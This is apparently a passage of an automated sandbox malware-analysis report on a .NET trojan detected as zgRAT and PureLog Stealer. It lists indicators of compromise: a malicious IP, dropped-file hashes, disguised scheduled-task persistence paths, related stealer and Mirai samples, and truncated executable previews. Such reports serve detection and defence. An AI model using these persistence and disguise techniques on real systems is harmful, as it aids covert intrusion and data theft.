https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.dr | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.1900716755.0000026100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1942628864.00000202361C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1906560868.0000013580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1921237248.00000202DABB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1924984491.000001AD034F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1942796990.000002849EF31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1935689556.00000227B40A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1936385377.0000026F301D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1920581928.000001DB55721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1899802364.0000018980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1920142698.000002AD24121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1936183069.000001E32E342000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 3XtEci4Mmo.exe, 00000000.00000002.1788927246.00000000029F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1900716755.0000026100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1942628864.00000202361C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1906560868.0000013580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1921237248.00000202DABB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1924984491.000001AD034F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1942796990.000002849EF31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1935689556.00000227B40A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1936385377.0000026F301D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1920581928.000001DB55721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1899802364.0000018980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1920142698.000002AD24121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1936183069.000001E32E342000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.dr | false | | high
                                                                https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000054.00000003.2651347076.00000241EDAC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000015.00000002.1936183069.000001E32E557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
IP:185.177.239.66
Domain:unknown
Country:Poland
ASN:9009
ASN Name:M247GB
Malicious:true
IP:127.0.0.1
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1586105
                                                                    Start date and time:2025-01-08 18:06:08 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 11m 8s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:84
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:1
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Sample name:3XtEci4Mmo.exe
                                                                    renamed because original name is a hash value
                                                                    Original Sample Name:529b29e8bcef9cc790f7c61f40d44b39.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@106/209@0/2
                                                                    EGA Information:
                                                                    • Successful, ratio: 50%
                                                                    HCA Information:Failed
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe, svchost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 23.56.254.164, 172.202.163.200, 13.107.246.45
                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                    • Execution Graph export aborted for target TezdDRgSgyeGDKRkzk.exe, PID 8300 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    • VT rate limit hit for: 3XtEci4Mmo.exe
Time  Type  Description
12:07:08  API Interceptor  502x Sleep call for process: powershell.exe modified
12:08:35  API Interceptor  79x Sleep call for process: TezdDRgSgyeGDKRkzk.exe modified
12:08:36  API Interceptor  2x Sleep call for process: svchost.exe modified
17:07:07  Task Scheduler  Run new task: conhostc path: "C:\Recovery\conhost.exe"
17:07:07  Task Scheduler  Run new task: TezdDRgSgyeGDKRkzk path: "C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe"
17:07:08  Task Scheduler  Run new task: TezdDRgSgyeGDKRkzkT path: "C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe"
17:07:11  Task Scheduler  Run new task: conhost path: "C:\Program Files\Google\Chrome\Application\conhost.exe"
Match:M247GB
Associated Sample Name / URL  Detection  Threat Name  Context
miori.m68k.elf  malicious  Unknown  217.138.193.6
Draft HBL# TTPE6948502 SO#4174 - LCL SHIPPING ADVICE (KHH-HKG)-FOB .scr.exe  malicious  PureLog Stealer, XWorm  104.250.180.178
Hilix.m68k.elf  malicious  Mirai  45.13.30.97
5EfYBe3nch.exe  malicious  LummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, Stealc  185.244.212.106
random.exe  malicious  Poverty Stealer  185.244.212.106
mpsl.elf  malicious  Mirai, Moobot  45.88.100.158
db0fa4b8db0333367e9bda3ab68b8042.i686.elf  malicious  Mirai, Gafgyt  213.109.189.115
UD3cS4ODWz.exe  malicious  Unknown  185.156.175.43
nXNMsYXFFc.exe  malicious  Unknown  185.156.175.43
UD3cS4ODWz.exe  malicious  Unknown  185.156.175.43
Match:C:\Users\user\Desktop\AfaiVEic.log
Associated Sample Name / URL  Detection  Threat Name
6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe  malicious  DCRat, PureLog Stealer, zgRAT
aW6kSsgdvv.exe  malicious  DCRat, PureLog Stealer, zgRAT
HMhdtzxEHf.exe  malicious  DCRat, PureLog Stealer, zgRAT
kJrNOFEGbQ.exe  malicious  DCRat, PureLog Stealer, zgRAT
lEwK4xROgV.exe  malicious  DCRat, PureLog Stealer, zgRAT
zZ1Y43bxxV.exe  malicious  DCRat
VqGD18ELBM.exe  malicious  DCRat, PureLog Stealer, zgRAT
updIMdPUj8.exe  malicious  DCRat
voed9G7p5s.exe  malicious  DCRat, PureLog Stealer, zgRAT
f3I38kv.exe  malicious  DCRat, PureLog Stealer, zgRAT
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):242
                                                                                        Entropy (8bit):5.823138385221527
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:Rxh+XPQE1X06AXAs8nZFjij+FDznCfQ/9Il00bOEhkhF:nKqQVZFjK+FDznCcI79yF
                                                                                        MD5:A23B6C0D67C04FF092F029F320625C3B
                                                                                        SHA1:9A7E555C63BCCD2E17A7FA57F9850BC6494B3CA5
                                                                                        SHA-256:7D6ADC23259C85629E1DE530F19A4D00AE1E2DDC9552FF2CC8DA1EBDB7E1548C
                                                                                        SHA-512:40C8F04EDDC349C1E0CD57C40918030D87CE15BC4F590E27316E621F89267E73868F52C2B58366D010361A0255720DCDC5DF562A2E359F536B6BE42E823B52C6
                                                                                        Malicious:false
                                                                                        Preview:KLCMOQlxyXcMqBgWLh8KmHMaXebnMm3uaHRxPRAyd3e0GfnTGAeM5jmC8myuy7kLerwittG3gKqsnWU21IhMHrz0fOyncQ9gSSWZtFkX3lpu23ZmS62qZYDx15De5dbQLKZU94JwiKSgBF8lzLUgXSG4PjhxCFbaJZjsdFnXwGIPFgvw6bouI522DfEaWVucs2XmfQHuh7tQK0zsxv0kaqROhqo8ANAbWphNJJQqT4MLLlrMqW
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):3823616
                                                                                        Entropy (8bit):7.833671064349166
                                                                                        Encrypted:false
                                                                                        SSDEEP:98304:g2Bl6PH1SpUiDnkFcbxHgsHZ5QXZQjS4CTWixanZ4+PLXxyaBGE:gqlofir0cb9gsHZypQu47ixanZ4KLXTg
                                                                                        MD5:529B29E8BCEF9CC790F7C61F40D44B39
                                                                                        SHA1:094A6C81F7A116D2099790DE3E7CD6449F1BB834
                                                                                        SHA-256:A9249873D68391DCDD604B5332C1F3EE1BE4303FF5BA8E83147FBAB20F87DE88
                                                                                        SHA-512:240D6DE89491ACC5229AFAC34579FE9A1D159D39A9DEDA72EAAF3BA73C31B45BE04E598CBFE31CA38817832E0208ADF8F3E5A7A59A56AF642A5B602748A431AC
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:true
                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with very long lines (605), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):605
                                                                                        Entropy (8bit):5.90224172997415
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:XikFg6ojnyBAkqRPFPj5V12NsdRH2/Tjwzintlwf0mYutX3n:XVaRyWkqRV5HqsdRHTzitlG0k3
                                                                                        MD5:7FCEFAA50F73A13EFF3079753296D259
                                                                                        SHA1:CB6E20041B1B440A1B94B4E4FCC69104CCE0B1BC
                                                                                        SHA-256:F8342C1222B939DFFAD431EC30071202DA6DB6E5ADFCA3318828CE6D504A2FB3
                                                                                        SHA-512:B39784485143C88EB5C09A1A82FC9BC1C4906FFD7FD1FD295BA1C9FDA6FFA080CEB4004435DD6578400BDCDDB9E2B77E52710039B9115303B45C5BB00F719037
                                                                                        Malicious:false
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):3823616
                                                                                        Entropy (8bit):7.833671064349166
                                                                                        Encrypted:false
                                                                                        SSDEEP:98304:g2Bl6PH1SpUiDnkFcbxHgsHZ5QXZQjS4CTWixanZ4+PLXxyaBGE:gqlofir0cb9gsHZypQu47ixanZ4KLXTg
                                                                                        MD5:529B29E8BCEF9CC790F7C61F40D44B39
                                                                                        SHA1:094A6C81F7A116D2099790DE3E7CD6449F1BB834
                                                                                        SHA-256:A9249873D68391DCDD604B5332C1F3EE1BE4303FF5BA8E83147FBAB20F87DE88
                                                                                        SHA-512:240D6DE89491ACC5229AFAC34579FE9A1D159D39A9DEDA72EAAF3BA73C31B45BE04E598CBFE31CA38817832E0208ADF8F3E5A7A59A56AF642A5B602748A431AC
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Google\Chrome\Application\conhost.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Google\Chrome\Application\conhost.exe, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:true
                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with very long lines (822), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):822
                                                                                        Entropy (8bit):5.906198725374328
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:OJQ6tXcZGNLW8nNHACTUt14Wc5D6KDqOzb:OJdDxWYNHddBOKuO/
                                                                                        MD5:967E00A530B451CB2705A41E539ADBC8
                                                                                        SHA1:C50C3EE76588D3DFE5DA18289ED25F75E2662781
                                                                                        SHA-256:E4E6D34E8F582BC0C3A7ED0B5DBD71D921ACA65A6A5B7D6B11C96CC59DDC62A6
                                                                                        SHA-512:5CDADAE2766CF51AF8BFB8FD8657B4B8BD624A82193D181FE82AC32426241567B7139ED7DCC16164FB061EC712C3F62A4A094B924D1E237CAB2AC2279A760AA5
                                                                                        Malicious:false
                                                                                         Preview:
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):3823616
                                                                                        Entropy (8bit):7.833671064349166
                                                                                        Encrypted:false
                                                                                        SSDEEP:98304:g2Bl6PH1SpUiDnkFcbxHgsHZ5QXZQjS4CTWixanZ4+PLXxyaBGE:gqlofir0cb9gsHZypQu47ixanZ4KLXTg
                                                                                        MD5:529B29E8BCEF9CC790F7C61F40D44B39
                                                                                        SHA1:094A6C81F7A116D2099790DE3E7CD6449F1BB834
                                                                                        SHA-256:A9249873D68391DCDD604B5332C1F3EE1BE4303FF5BA8E83147FBAB20F87DE88
                                                                                        SHA-512:240D6DE89491ACC5229AFAC34579FE9A1D159D39A9DEDA72EAAF3BA73C31B45BE04E598CBFE31CA38817832E0208ADF8F3E5A7A59A56AF642A5B602748A431AC
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................P:..........o:.. ....:...@.. ........................:...........@.................................po:.K.....:.p.....................:...................................................... ............... ..H............text....O:.. ...P:................. ..`.rsrc...p.....:......R:.............@....reloc........:......V:.............@..B.................o:.....H.......4..........j......../..n:......................................0..........(.... ........8........E................9...8....(.... ....8....*(.... ....~....{....9....& ....8....(.... ....~....{f...:....& ....8........0..)....... ........8........E........k...............*...8.......... ....~....{....:....& ....8........~....(@...~....(D... ....?S... ....~....{z...:....& ....8x...~....9.... ....~....{....9Z...& ....8O...r...ps....z*8.... ....~....{c...:*...& ....8....~
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:false
                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6e68d43d, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.4221440845528391
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:5SB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:5aza/vMUM2Uvz7DO
                                                                                        MD5:473C31C4D8009E1338A0611007CE81BB
                                                                                        SHA1:E5B61C125082C7FFA72CFB1BD3E1A4EA4DB9DAEA
                                                                                        SHA-256:2F62C994DE5FBBA7107D6731492694AF9E1C2FF1B154FF8AF1B22ED3687DC559
                                                                                        SHA-512:3BAFA80377B438B2D1493A367C732F80E0509B22C6D8E6B70B43AFEE6FDBD22791351497BD2AEADBE5A80F32A299C76CD7E5B56D1E72A1E9857B7CBE7B7A1902
                                                                                        Malicious:false
                                                                                        Preview:nh.=... .......A.......X\...;...{......................0.!..........{A.$....}s.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................>..$....}......................$....}s..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with very long lines (969), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):969
                                                                                        Entropy (8bit):5.889663121891552
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:xr7VUC6V0bFX7URF2O5WbIecN1X6KBAU9z:xrBUjatI1X/5z
                                                                                        MD5:19BFFF98353E363832CC121CACCD1297
                                                                                        SHA1:4A78D8069E3613FFEC9EC9FF7BF28AEBB775860D
                                                                                        SHA-256:06749A1E9CE524BB6520C01F53C63AB4EFEDA451380368B167C4B51D80CE7A91
                                                                                        SHA-512:5A83CFDBEFFB7160D7E52FF44B1BC938B593E764B0387D93CE2551F9A2DB2BBC0C9004DB64ADEFC32B1D12C2A88FB4F8320233129269CCAEF0450738389597FE
                                                                                        Malicious:false
                                                                                        Preview:y67fuCNFWlDhnCYo0HDdhBWxeZVHuH1OylB4iGDFdhXJ815cZjqbNUaxkKAVqFUOtzsCBdFuD79AnNynd2rLbaAeKNUYFsZYMIZII3a6e6XQUaJXVX2xYJxSzO2yIqpVilxexpfkbvqfCtJtD7Dr0l9CVGT4AmxxQCrtmpjq1SVndSQFEIuLn7e6lvJqVkjz82OACaGYYW0iQWjD0O012lKThuH1f2URsgokDQDoCWxQH6qPMG0Hus7Wr4cRSP2fCiztr89kLLzfy3MkD2pZBNgAjS2JxvWxdROiH7hNHQ6i2bhys1NZjddyCzKZF0wZzCCgpodGVcSvQ7HHuEa5i6N9yZfSwIHRdht0ZBIEYGEHLsiErCoBZ003yCsPIKUNUBRtOQst5Whc2GyF1aktdG1nqzCWS36Nw0xKay0aU4FCTYAsNmYrkktNJoDYOVbCaUpBSopCkJZiByTSyUJpeOnLHkAvvbM8dCm9s9Zj6VHaLKLUUuk3MvhLqd3sn4RI6aF9MUjz4jsJHMA7YqaA1SwseaSPFq5CD8dvFMHALv9mCYEdd6U6eQRonXewCTtOoqFJtP2LiayGTJpGVyvJW8hwqzHrsV71Bv8WS5uOEJYEcLUdrYaOhj1pJSc4HKdNc6EiLTxaEhFNkdUffn9U4tTc3TM9dzG3pKlfGvSYkAJAeoEq86ZdKIStmmp2Gy6OaLha1zYtVlt4jT7OPgBgansg122eGaSvD5jTHnyJhqIjZYJToamjxZxxcAi864m5S70otoGlr19ueJHdtjzqxs8nHw0HE0MnDMRbhejATB15aCST2FPWE6Ij9Nh7x9g1pVqS2q5OAyWv1DMEdhO9kzjHErbU7lNUe9QFVAaLKBWPjWs5AcePuhRzwjNKOlQYlCR1xHsdGCyjdTis8gTfH8j6saSwwQ6iu8ohE1H2tAIstsVdAfMsRvQmdVIWz6q0FPyfoBnHY
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):3823616
                                                                                        Entropy (8bit):7.833671064349166
                                                                                        Encrypted:false
                                                                                        SSDEEP:98304:g2Bl6PH1SpUiDnkFcbxHgsHZ5QXZQjS4CTWixanZ4+PLXxyaBGE:gqlofir0cb9gsHZypQu47ixanZ4KLXTg
                                                                                        MD5:529B29E8BCEF9CC790F7C61F40D44B39
                                                                                        SHA1:094A6C81F7A116D2099790DE3E7CD6449F1BB834
                                                                                        SHA-256:A9249873D68391DCDD604B5332C1F3EE1BE4303FF5BA8E83147FBAB20F87DE88
                                                                                        SHA-512:240D6DE89491ACC5229AFAC34579FE9A1D159D39A9DEDA72EAAF3BA73C31B45BE04E598CBFE31CA38817832E0208ADF8F3E5A7A59A56AF642A5B602748A431AC
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................P:..........o:.. ....:...@.. ........................:...........@.................................po:.K.....:.p.....................:...................................................... ............... ..H............text....O:.. ...P:................. ..`.rsrc...p.....:......R:.............@....reloc........:......V:.............@..B.................o:.....H.......4..........j......../..n:......................................0..........(.... ........8........E................9...8....(.... ....8....*(.... ....~....{....9....& ....8....(.... ....~....{f...:....& ....8........0..)....... ........8........E........k...............*...8.......... ....~....{....:....& ....8........~....(@...~....(D... ....?S... ....~....{z...:....& ....8x...~....9.... ....~....{....9Z...& ....8O...r...ps....z*8.... ....~....{c...:*...& ....8....~
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:false
                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1915
                                                                                        Entropy (8bit):5.363869398054153
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
                                                                                        MD5:0C47412B6C6EF6C70D4B96E4717A5D3B
                                                                                        SHA1:666FCC7898B52264D8A144600D7A3B0B59E39D66
                                                                                        SHA-256:0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
                                                                                        SHA-512:4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
                                                                                        Malicious:true
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1456
                                                                                        Entropy (8bit):5.362485656371469
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNt1qE4GIs0E4KjJE4VE4j:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIW
                                                                                        MD5:8754EE8606838243DB62D2041DB5B769
                                                                                        SHA1:09BEF02C7C76A250EEEC032792EF7F74961E66DA
                                                                                        SHA-256:5C95958D140BE11D69653A043D69DF7E4568C7D3EC511D5C206BE7C66F74BD13
                                                                                        SHA-512:FAF12AFEEFE5C253903DF150D347B03F217391B344D6DE7D67C73B76FB7F5F370554AD13ADD8FDE9060CB1304DA21271D0B66F53468EE6B70EF6F98D2F937C0E
                                                                                        Malicious:false
